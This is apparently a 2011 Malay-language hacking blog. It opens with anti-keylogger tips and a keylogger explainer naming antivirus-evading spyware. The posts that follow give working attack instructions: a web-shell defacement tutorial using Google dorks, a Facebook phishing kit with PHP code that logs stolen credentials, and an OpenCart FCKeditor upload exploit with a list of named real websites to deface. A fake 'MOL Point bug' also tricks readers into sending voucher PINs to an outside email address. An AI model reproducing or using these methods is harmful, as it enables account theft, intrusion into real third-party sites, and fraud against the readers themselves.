Wednesday 31 August 2011

Cara Mencegah Account Facebook di Hack

Langkah 1

Download Software Anti Keylogger, Disini. Tools ini versi Portable edition ketika anda selesai download langsung bisa digunakan. Ringan sekali dijalankan.

Langkah 2

Aktifkan Tool yang sudah anda download tadi. Selanjutnya Klik menu File dan Klik menu Klik On Top. Tujuannya supaya jika anda klik window yang lain tools ini tidak terHide atau tersebunyi.

Pada jendela facebook anda ketikan terlebih dahulu email anda, dan hapus kata password pada kotak isin pasword facebook anda sampai tidak terisi dengan kata apapun.

Langkah 2

Perhatikan gambar berikut:
Posted Image
Perhatikan pada bagian yang saya lingkari hitam. Pada jendela Tools Neo’s Safekeys anda ketikan password anda atau gunakan virtual keyboard yang sudah disediakan.

Block password yang sudah anda ketikan pada kotak isian di dalam tools tadi, selanjutnya dalam keadaan terblock klik dan tahan password anda tadi lalu geser atau drag ke kotak isian password pada account facebook anda.

Secara otomatis password anda akan langsung terisi pada kotak isian password facebook anda tanpa anda perlu mengetiknya secara manual.

Mudah-mudahan berguna untuk anda dan selamat mencoba... Thanx For Me If This Is Work
 

Keylogger

Keylogger kadangkala dirujuk sebagai Perisian Pengintip iaitu sejenis program kecil yang digunakan untuk memantau segala aktiviti komputer yang menjadi sasaran (local atau remote PC). Keylogger teramat mudah untuk digunakan sehingga seseorang yang hanya mempunyai asas pengkomputeran boleh menggunakannya..apabila ia telah memasuki satu-satu komputer, segala aktiviti keystroke (taipan kekunci keyboard) akan dapat direkodkan dan dihantar kepada pemunya keylogger tersebut..

Terdapat 2 jenis keylogger iaitu:

1. Keylogger dari jenis perisian
2. Keylogger dari jenis perkakasan


Keylogger dari jenis perkakasan (sebagai contoh USB keylogger) sudah jarang sekali digunakan kerana keylogger dari jenis perisian lebih mudah digunakan tambahan pula ia menyokong aplikasi untuk memasangnya (install) secara remote sahaja dan ini bererti anda dapat memantau aktiviti mana-mana komputer di seluruh dunia..(ayat aku skema sikit hari ni sebab konon-konon buat kerja la depan bos..heheh)



Dapatkah keylogger dikesan oleh mangsa?


adalah amat sukar mengesan keylogger sebaik sahaja ia dapat masuk ke komputer si mangsa kerana ia bergerak/berfungsi dalam keadaan STEALTH MODE iaitu ia menyembunyikan diri dari task manager, startup dan sebagainya..


Bolehkah mangsa mengesan tuan pemunya keylogger?

sekali ia memasuki PC, terlalu sukar untuk mengesan tuan pemunya keylogger..


Bagaimanakah cara untuk melindungi diri dari menjadi mangsa?

Keylogger yang ringkas dapat dikesan oleh antivirus yang paling lemah sekalipun..namun, kebanyakan yang menggunakan keylogger bertindak bijak apabila melakukan proses enkripsi pada keylogger tersebut seperti Crypting, Binding, Hexing, dan sebagainya sehingga ia menyebabkan kesukaran kepada antivirus untuk mendeteksi keylogger..Oleh itu untuk mengelakkan diri daripada menjadi mangsa, My Hackers Are Here menyarankan anda supaya menggunakan perisian yang dipanggil sebagai Sandboxie..Sandboxie menjalankan setiap program komputer anda di dalam satu bahagian yang terasing pada partisi cakera keras anda..jadi ini dapat mengelakkan sebarang perubahan kekal pada komputer..pengguna Firefox boleh menggunakan versi percuma Keyscrambler yang meng-enkripsi setiap keystroke yang telah ditaip..oleh itu anda tidak perlu lagi bimbang kerana penyerang akan mendapat keystroke yang telah di-enkripsi oleh Keyscrambler tadi..



Keylogger manakah yang terbaik?


Setakat yang dijumpai oleh aku, ada blogger (juga seorang hacker) mengatakan terdapat 2 jenis keylogger yang terbaik (dapat melepasi Antivirus) setakat ini iaitu:

1. Snyperspy
2. Winspy


Bagaimanakah caranya untuk mengesan Keylogger yang telah digabungkan bersama fail yang lain?

Keylogger dapat digabungkan dengan hampir apa jua jenis fail..anda boleh menggunakan Bintext atau Hex Editor..cuma Bintext atau Hex Editor ini tidak berkesap terhadap sambungan internet yang ter-enkripsi oleh itu anda boleh menggunakan alternatif daripada sebuah perisian yang dinamakan sebagai Resourse Hacker yang boleh memberitahu anda sama ada fail yang dicurigai itu telah digabungkan bersama dengan keylogger ataupun tidak..

Deface Tutorial Version 2

Salam smua... Macam mane dgn deface tutor yg gne FCKeditor? Leh paham ke idak? Dapat ke x? :tongue: Bagi ssiapa yg dah dpt tue, korang leh try yg nie lak..Yang nie lain skit sbab kite kene upload shell^^.. Bukan saje Shell, petronas, esso smua leh upload kalo korg reti... xD..So, jom kita mulakan....

So langkah 1 mcm biasalah... cari web target :smile: Korang dh dapat target website? Kalau masih belum silakan cari di google melalui google dork yang korang ada atau boleh cari dgn melihat Google Dork Remote File Inclusion – 

Webapps di www.exploit-db.com sampai korang dapat target website tue.

langkah 2: Setelah mendapatkan target website, silakan upload SHELL INJECT anda, Korang boleh guna shell yg aku bagi nie... Shell Downloader

Langkah 3: Lepas korang dah download Shell Injection, siapkan halaman “DEFACEMENT PAGE“, lepas tue name kan dgn berformat .html .. :tongue:

Langkah 4: Dah siap smua kat atas, jom kita g target website kite..


Penerangan Yang Tidak Seberapa

Langkah 1 :okey, so kat snie korang leh carik target website dgn menggunakan dork nie “inurl:page.php?xxx=” atau “intitle: Google Dork” Kalo korang xjumpa korang leh g sini Google Dork List

Nah , dah dapatkan ? Pastue tnggu ape lagi.. Inject lah...xD 

Posted Image


Langkah 2 : Langkah selanjutnya, sampai masa kita nk upload shell yang kita download tadi. So kita akan upload benda nie dekat direktori nie /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.co...ludes/*****.php (nama shell)

Posted Image

Lankah 3 : Setelah itu kita siapkan file halaman defacement page kita yer : “******.html”: *pastikan .html yer

Langkah 4 : Dah siap deface page ? Ape lagi upload le ke web tue.. Upload kat snie /vservers/silentcat/htdocs/ bermakna skrg kita berada dekat home directory.

Posted Image

Langkah 5 : Bile dah upload pastikan nampak macam nie: -

Posted Image

Langkah 6 : Ini yg penting kita kene edit sikit... Skrang permission yg admin setkan adalah “600” (rw——-), ..Itu bermaksud juz admin yg boleh melakukan 'read & write' dekat fail tersebut.. JAdi jom kita tuka supaya semua boleh mngubah fail tersebut atau kata lain “read, write & execute. So, nk ubah ke berapa? Ubah ke 777″ / “755″,...Pilih lh mana-2 yg korang nak...

Posted Image

Langkah 7: Kalo dah siap, korang leh tgk hasil dia macam nie, http://www.target.com/********.html”

Posted Image


Enjoy & Eat It!
Salam Hangat Buat Langsi Family^^.. Aku xsure wat nie kene hide IPor x.... Tapi tok safety korang hide je la.. 
:laugh:

HAcking Facebook Method Phishing

ok, skrg 1st step korg kene g kat web nie dulu ripway.com ..... ripway nie slalu problem...so, korg kene refresh je sampai die dh boleh masok main page die... Bak kate nenek, refresh sampai lobam^^... Okey, bile dh masuk korang Sign up kan akaun ripway korang tue..... 

2nd step : FILE 1 : bile korg dh login masuk smua siap, korang pegi kat MY FILES pastue klik CREATE TEXT FILES.. pastu korang leh namekan ape2 pon xper... YG PENTING MESTI ADE .html oke ...
okey.... bile korg dh siap name tue, korg start copy soskod FB ..... nk senang mcm nie ler .... korg copy soskod kat link phshing aku nie...http://h1.ripway.com...ily89/LFSH.html ...mesti reti kan copy soskod
:smile: xperlu save kat notepad dulu...korang copy tros paste je kat ruang kosong tue... lepas tu tekan create ye sayang2 :kiss: Aku suggestkan korang xyah tuka ape2 kat bahagian login.php tue.

FILE 2 : pastu CREATE TEXT FILES lagi ..kali ni utk file .php korang.. cth cm aq pny aku namekan login.php .. ok lepas tue korg paste script nie 

<?php

header("Location: http://www.facebook.com/");
$handle = fopen("ShTeamr.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


bahagian Sh Team tue korg leh ubah taruk le name ape pown korang nk tarok.. Lepas tue CREATE... Baru Siap yg ke 2...


Last Step : FILE 3 : Yg ketiga nie snang skit lah.... Korg create fail macam tdi... pastue korang save name fail nie same macam kat file 2 yg aku soh copy script tadi tue.... macam tdi name nie kan $handle = fopen("ShTeamr.txt", 
"a"); , so korang save pon name ShTeam...tpi ikut name korang save yg dlm tue ler..jgn letak SH team gak = ="....

Lepas tue create..xyah copy paste ape2 pon..biar kosong jer^^...
Fail password tue akan kluar mcm nie nnty  



Posted Image




































So, siap suda umpan memancing anda... Pendek kata 

file 1: .html phishing page korang
file 2: .php direction ble org klik login
file 3: .txt utk smpn smue pswd

tpi 1 kelemahan ripway nie..asyik error jer...kalo org tue rajin refresh xpe la..kalo die malas nk refresh, korang le melepas =="...


Ok lah, aku rase korang boleh paham kot... Benda nie kalo korang bace saje tanpa korg try kat ripway memang susah... Korang kene buat bnda nie smbil bukak ripway... Kalo bace je memang xdapat ler... Ok lh, kalo korang xtw pape, nnty yanye erk... Kalo dh berjaya, aku harap jgn le pekenakan sesama member seperjuangan..^^ 

Deface Tutorial Version 1 (fckeditor)

Assalamualaikum semua , cara-2 mendeface website senag sahaja , caranya mudahsaja .

caranya seperti berikut .


deface menggunakan 
file.html


dork : :Powered by Opencart site:.com

:SUPPORT BY OPENCART



[+] exploit : /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html



msukan dork digoogle..

cari satu persatu web yg msih punya bug (belum di patch)



terus msukan exploitnya..

contoh :

www.situstarget.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html





-ganti connector : ASP ke PHP

-pilih file

-upload



okay , macam mana dengan pencarian website target ?

kalau sudah jumpa ,

tambah dibelakangnya seperti berikut:



www.situstarget.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/FileKamu.html

jadi :

www.situstarget.com/NamaFileKorang.html

enter.....

selesai :D



ini website yang tersedia untuk di deface .





http://bestonlinediscounts.net/

http://wenrestaurant.com/

http://ruthsgarden.com/

http://www.utahflowers.net?/

http://www.inlove.my/

http://megamall.com.pk/

http://stefanyboutique.com?/

http://www.inputandanalysis.com/

http://www.virtualgeorge.info/

http://iphoneclone.biz/

http://amourcristallis.com?/

http://www.eesnet.org/

http://www.schoolshopper.com.au/

http://www.mymaxi.nl/

http://wiretek.net/

http://shop.tjokgus.com/

http://www.aquariumsystem.it/

http://uae-shopper.com/

http://organicjewelries.com/

http://www.granmasantiques.com/

http://avocadogenie.com/

http://www.inputandanalysi?s.com/

http://www.utahflowers.net/

http://stefanyboutique.com/

http://amourcristallis.com/

Credit to: Cat-Evilcodes


MOLPoint BuG(Step by Step)



First go to 7-11 near your house and purchase "MOL Point" point, RM3/RM5/RM10 / RM20 / RM30 how much will do ... (1)Go to www.mol.com login to your MOL account, choose your The MOL Point from where to buy, then click Reload Now. ( I will use Rm40 to do today demonstration)




2. Then,  select Friend's Account / Third Party .And fill in  'molcentre@hotmail.com ', then enter your Serial Number and Pin Number. Lastly,click the submit (do not worry you will recharge to the administrator because the administrator account will only result in recharge to the system )


3)The next step is the key to hack! Check the serial number and pin number and click Confirm .



(4) Click the Confirm, the page will automatically jump back to recharge the screen and prompts you [Reload failed! ] (Do not worry your Serial Number and Pin Number is still valid, the interface is normal)

5) Next, repeat steps 2 to 4, repeat Reload Fail 3 times to make the system 'Going CRAZY'
(6) When the fourth time, choose Own Account .


(7) The mol point will be in your account twice the amount you reload.. xDD
HAPPY HACKING!!
(7) The mol point will be in your account twice the amount you reload.. xDD

HAPPY HACKING!!
SEE!!




Why i will have RM160?? 
I would have been RM80,i reload RM40 painted with double is RM80,
RM80+RM80=RM160

On the principle:
This account is online MOL Delta system admin account, every time it sends a delta packet to the server, which means you washed several times the value of the delta packet is sent to the server, then send out packets how to do it? Let us call it the "cumulative" it, so everyone is easy to understand. When you enter your 4th account the delta, the former three "cumulative" effect on the time added to the last.
Here some friends will ask, If so, then I use "MOLSYSTEM" Delta account the background of this system when I repeat 10 times or more. That I am not well developed yet? Good question, but delta system in the MOL system or have their own protective measures, on this account the day it also has a limit.You must not be greedy, one day only reload 2 times. Remember!!! 
SEE!!

Saturday 27 August 2011

Akulah Pewira

Seorang pemain yang tidak beberapa pro sangat yang asyik main permainan komputer
Aku telah memasuki sabuah pertanding yang berada di Bukit Indah
Aq pi je la sna ngn geng² aq....
impian aq trcapai la wei dpt msok tournament
tpi akn x trcapai sbb klah